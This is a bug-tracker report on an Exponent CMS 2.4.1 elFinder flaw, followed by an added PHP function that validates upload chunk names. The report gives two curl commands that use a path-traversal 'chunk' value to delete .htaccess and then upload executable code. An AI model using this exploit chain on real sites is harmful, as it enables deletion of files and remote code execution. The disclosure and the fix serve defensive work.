Exponent CMS 2.4.1 - Unrestricted File Deletion / Upload Vulnerability in elFinder
Reported by mm | January 10th, 2017 @ 04:52 PM
Allows deleting arbitrary files and thus bypassing .htaccess restrictions on uploadable executable PHP files due to a flaw in external/elFinder/php/elFinder.class.php
Example:
curl "[exponent]/framework/modules/file/connector/elfinder.php" -F "cmd=upload" -F "target=l1_" -F "upload[]=" -F chunk="../[exponent]/files/.htaccess"
curl "[exponent]/framework/modules/file/connector/elfinder.php" -F "cmd=upload" -F "target=l1_" -F "upload[]=@[remote code]"
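A server-side check that would refuse the `chunk` value shown in the report, as an added example that is not part of the original ticket and is not elFinder's or Exponent's code. It assumes the upload handler joins the client-supplied chunk name onto a temporary directory before writing or unlinking that path; `safeChunkPath` and the sample names are hypothetical.

```php
<?php
// Added example: hypothetical helper, not elFinder's or Exponent's code.
// Assumption: the handler builds "<tmpDir>/<chunk>" from the request and
// later writes to or unlinks that path.

/**
 * Return an absolute path for a chunk that is guaranteed to sit directly
 * inside $tmpDir, or null if the client-supplied name must be rejected.
 */
function safeChunkPath(string $tmpDir, string $chunk): ?string
{
    $base = realpath($tmpDir);
    if ($base === false || !is_dir($base)) {
        return null; // temp directory missing: fail closed
    }

    // Allow-list: a single path component, no separators, no NUL bytes,
    // no leading dot (so "..", "." and ".htaccess" can never be addressed).
    if (!preg_match('/\A[A-Za-z0-9][A-Za-z0-9._-]{0,254}\z/', $chunk)) {
        return null;
    }

    $candidate = $base . DIRECTORY_SEPARATOR . $chunk;

    // If something already exists under that name, resolve symlinks and
    // confirm the real target is still inside the temp directory.
    if (file_exists($candidate) || is_link($candidate)) {
        $real   = realpath($candidate);
        $prefix = $base . DIRECTORY_SEPARATOR;
        if ($real === false || strncmp($real, $prefix, strlen($prefix)) !== 0) {
            return null;
        }
        return $real;
    }

    return $candidate;
}

// Constructed inputs: the traversal value from the report, a bare dotfile
// name, and a benign chunk-style name.
$names = ['../[exponent]/files/.htaccess', '.htaccess', 'photo.jpg.0_3.part'];
foreach ($names as $name) {
    $path = safeChunkPath(sys_get_temp_dir(), $name);
    echo str_pad($name, 32), $path === null ? 'REJECTED' : 'accepted', PHP_EOL;
}
```

The handler should call such a check before any write or delete and abort the request when it returns null, rather than falling back to the raw value.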
Bug Tracker for Exponent CMS